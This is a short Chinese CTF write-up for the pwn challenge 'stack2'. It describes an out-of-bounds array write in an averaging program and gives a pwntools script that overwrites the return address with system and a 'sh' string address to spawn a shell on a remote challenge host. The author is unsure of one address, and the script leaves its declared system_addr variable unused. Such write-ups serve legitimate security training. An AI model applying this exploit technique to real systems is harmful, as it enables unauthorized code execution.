stack2

check一下,发现开了NX和canary


image.png

拖进ida,发现是一个求平均数的程序,有system和/bin/bash



image.png

image.png

发现栈溢出,在j处,没有控制其小于100,所以栈溢出为0x84


image.png
image.png

脚本 
system_addr=0x080485AF
leave_offset=0x84
 
 
def write_addr(addr,va):
    io.sendline("3")
    io.recvuntil("which number to change:\n")
    io.sendline(str(addr))
    io.recvuntil("new number:\n")
    io.sendline(str(va))
    io.recvuntil("5. exit\n")
 
io=remote('111.198.29.45','34639')
io.recvuntil("How many numbers you have:\n")
io.sendline("1")
io.recvuntil("Give me your numbers\n")
io.sendline("1")
io.recvuntil("5. exit\n")
#将system的地址写入,小端序
write_addr(leave_offset,0X50)
write_addr(leave_offset+1,0X84)
write_addr(leave_offset+2,0X04)
write_addr(leave_offset+3,0X08)
# sh_addr  0x08048987 ??这个我不太清楚
leave_offset+=8
print leave_offset
write_addr(leave_offset,0x87)
write_addr(leave_offset+1,0X89)
write_addr(leave_offset+2,0X04)
write_addr(leave_offset+3,0X08)
 
io.sendline("5")
io.interactive()
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 隔壁老王|阿昆家的事
    阿昆已经三天三夜未归家了 家里已到了无米下炊的境地 他老婆与三个年幼的孩子 整日在饥寒中度过 这一日,实在撑不下去...
    隔壁老王_d572阅读 277评论 1 3
  • 咏怀之十九
    一笑春风里 野陌俏穿纱 大雁归飞梦 紫燕寻旧家 天遥青山远 地僻黄昏鸦 经霜菊泪浅 拥雪厚梅花 好月风约客 残阳雨...
    慕愚堂阅读 197评论 3 8
  • 女人,请留点爱给自己
    在昏黄的路灯下,一个中年妇女正用身子抵住驮着两个大竹筐的自行车,两只手从一个小推车里向外抓梨,放到依在她身上的竹筐...
    善下归海阅读 459评论 1 3
  • 《踏歌行*闲》
    绿水随风滟,红英伴雨眠。 闲庭听秀竹,老案拂幽兰。 杯旧映婵娟。剑老锈关山。
    牡丹员外阅读 256评论 0 3